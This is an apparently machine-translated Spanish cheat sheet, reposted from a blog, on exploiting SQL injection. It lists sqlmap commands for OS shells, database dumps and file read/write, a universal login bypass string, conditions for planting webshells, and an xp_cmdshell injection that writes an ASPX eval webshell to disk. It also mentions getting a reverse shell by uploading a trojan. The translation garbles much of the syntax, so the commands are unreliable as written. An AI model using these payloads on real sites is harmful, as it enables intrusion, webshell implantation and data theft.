sql injection explotar vulnerabilidades

La explotación de una vulnerabilidad (sqlmap)

Base de datos de elevación de privilegios

1. La cáscara se puede obtener directamente, es posible obtener privilegios del sistema
sqlmap -d "mysql: // root: root @ IP / base de datos" - OS-shell
2.Mysql puede utilizar el SQL-shell y luego hablar de la UDF derecha

contraseña universal

'O 1 = 1'

volcado de la base

-u punto de inyección detectar
--current-db ver la base de datos actual
--current-usuario para ver el usuario actual
--tables
--columns
--dump

Leer y escribir archivos (necesidad de haber leído y acceso de escritura, y secure_file_priv relacionados)

--file-lectura para leer el archivo
--file-escritura se pueden cargar archivos locales (parámetros relacionados con la cáscara local)
--file-dest escrito en el archivo de destino (parámetros relacionados con la dirección del sitio invasión)

Get WebShell condiciones

1.php + MySQL sitio web para las condiciones de tipo WebShell
privilegios de la cuenta root (1) MySQL, cuenta también configurar la conexión a la cuenta root de MySQL, la cuenta de root no tiene
privilegios de root preparados pueden.
(2) GPC configuración cerrada, capaz de utilizar comillas simples
(3) tiene una ruta absoluta del sitio, y puede estar provisto de permiso para escribir en una carpeta de archivo
(4) no está configurado seguro-file-priv propiedad
2.MSSQL + ASP / Asp. sitio web tipo de red para la condición WebShell
(1) es un usuario sa base de datos
(2) la capacidad de crear xp_cmdshell, aunque la cuenta sa también se puede conectar en algunos casos, pero no se puede utilizar
xp_cmdshell. (3) saben el camino real
(4) puede ser generada por el eco de comandos shell
puntos de inyección escritas directamente
; Exec master..xp_cmdshell 'echo ^ <% @ Page
Language = "JScript" % > <% la eval (Request.Item [ "Pass "]," la inseguridad ");% ^ >>
C: \ WWW \ 233.aspx '; -
la línea de comandos:
echo ^ <% @ Page Language =" JScript "% > <% eval (Request.Item [" pasar "],"

sqlmap get WebShell

.-- os-shell 1
(1) directamente conectado a la base de datos (se puede configurar para permitir que los usuarios externos a Log)
(2) para conocer la ruta absoluta, y el usuario tiene permiso de escritura
shell 2.msf rebote (permisos de escritura y la ruta)
cargar el archivo de Troya y rebotó cáscara
3. cáscara subido
por sqlmap obtener de cuenta y contraseña para cargar cáscara de fondo

Supongo que te gusta

Origin www.cnblogs.com/lyxsalyd/p/12594697.html
Recomendado
Clasificación